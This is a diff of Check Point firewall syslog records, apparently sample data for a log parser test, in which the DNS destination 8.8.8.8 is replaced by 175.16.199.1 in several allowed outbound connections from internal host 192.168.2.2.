+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33672"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57220"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33597"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52854"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53222"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33730"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34470"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44011"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33730"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34470"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44011"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54492"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.108.173.172"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34466"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46174"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46949"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57480"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52439"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33492"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43905"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51103"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57648"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33119"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55401"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46174"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46949"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e04e,0x13,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"20"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504334"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57480"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52439"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33492"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43905"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:52:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e050,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504336"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51103"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
